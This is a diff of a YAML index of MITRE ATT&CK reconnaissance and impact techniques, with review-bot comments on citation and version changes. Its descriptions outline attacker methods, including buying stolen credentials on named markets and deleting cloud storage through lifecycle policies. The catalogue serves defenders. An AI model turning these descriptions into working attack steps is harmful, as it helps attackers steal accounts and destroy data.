Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -57264,12 +57946,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -57278,16 +57958,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -57300,8 +57980,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
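Review bot: the SecurityTrails Google Hacking reference keeps `source_name: SecurityTrails Google Hacking` and the 'Borges, E. (2019, March 5)' citation text, but its `url` now points at recordedfuture.com (`.../threat-analysis-techniques/google-dorks`) with a 2024 retrieval date; the inline `(Citation: SecurityTrails Google Hacking)` in the T1593 description above still resolves, so nothing breaks, but the citation metadata no longer matches the host and path it points to and a reader following it will not land on the page the citation names.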
@@ -57312,52 +57992,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
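Review bot: the T1597 description drops the `(Citation: D3Secutrity CTI Feeds)` marker and the matching `D3Secutrity CTI Feeds` entry is removed from `external_references`, so no dangling citation is left (the misspelled source name goes with it), and the remaining `(Citation: ZDNET Selling Data)` still has its reference entry. The `x_mitre_version` bump to '1.1' and the added contributor line up with that wording change; since this is one of the few hunks where a technique's description of record changes rather than just its key order, it should be called out in the commit message.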
@@ -57379,7 +58057,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -57395,8 +58073,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
@@ -57422,7 +58098,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -57440,8 +58116,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -57463,7 +58137,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -57479,12 +58153,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -57494,17 +58166,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
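Review bot: the restructured T1589.001 description introduces three new citation markers, `Bleeping Computer 2easy 2021`, `SecureWorks Infostealers 2023` and `Bleeping Computer Stealer Logs 2023`, and their `external_references` entries are added in the three hunks further down, so every marker resolves. The sentence order also changes (the MFA/OTP sentence now precedes the leaked-data-sets sentence) and the purchase sentence is expanded with named markets and Telegram channels; because this alters the description of record, the `x_mitre_version` move from '1.1' to '1.2' in the later hunk is the correct accompaniment and the pairing is worth stating in the commit message.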
@@ -57516,6 +58191,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -57526,7 +58202,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -57536,6 +58212,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -57548,6 +58228,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -57570,6 +58254,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -57577,9 +58265,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -57638,7 +58325,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -57658,7 +58345,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
@@ -57680,7 +58366,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -57696,12 +58382,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -57770,7 +58454,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
@@ -57818,31 +58502,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -57851,19 +58516,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
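Review bot: T1595.001 gains `'Network Traffic: Network Traffic Content'` as a data source alongside a new contributor and an `x_mitre_version` move from '1.0' to '1.1', but `x_mitre_detection` in the visible context is unchanged and still describes only volume-based indicators (large quantities of traffic from a single source). If upstream updated the detection text to match the new content-based data source, that change is not in this hunk; if it did not, the version bump is explained only by the data-source addition. Either way the commit message should say which.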
@@ -57921,7 +58608,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -57942,7 +58628,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -57958,8 +58644,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -57985,7 +58669,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -58001,8 +58685,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -58026,7 +58708,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -58048,13 +58730,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -58146,13 +58826,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -58161,7 +58840,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -58178,17 +58856,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
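Review bot: the `- x_mitre_modified_by_ref` at the top of this hunk is a move, not a loss; the field is re-added at the end of the T1498.001 object next to `x_mitre_attack_spec_version: 3.2.0`, so no value is dropped. The substantive change is that Azure AD, Office 365, SaaS and Google Workspace leave `x_mitre_platforms` with the bump to `x_mitre_version: '1.4'`; since this file feeds per-platform indexes, make sure those are regenerated from the same data so a technique no longer tagged for a platform does not linger in that platform's index.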
@@ -58213,7 +58886,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -58251,7 +58925,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -58285,12 +58959,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -58355,42 +59027,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
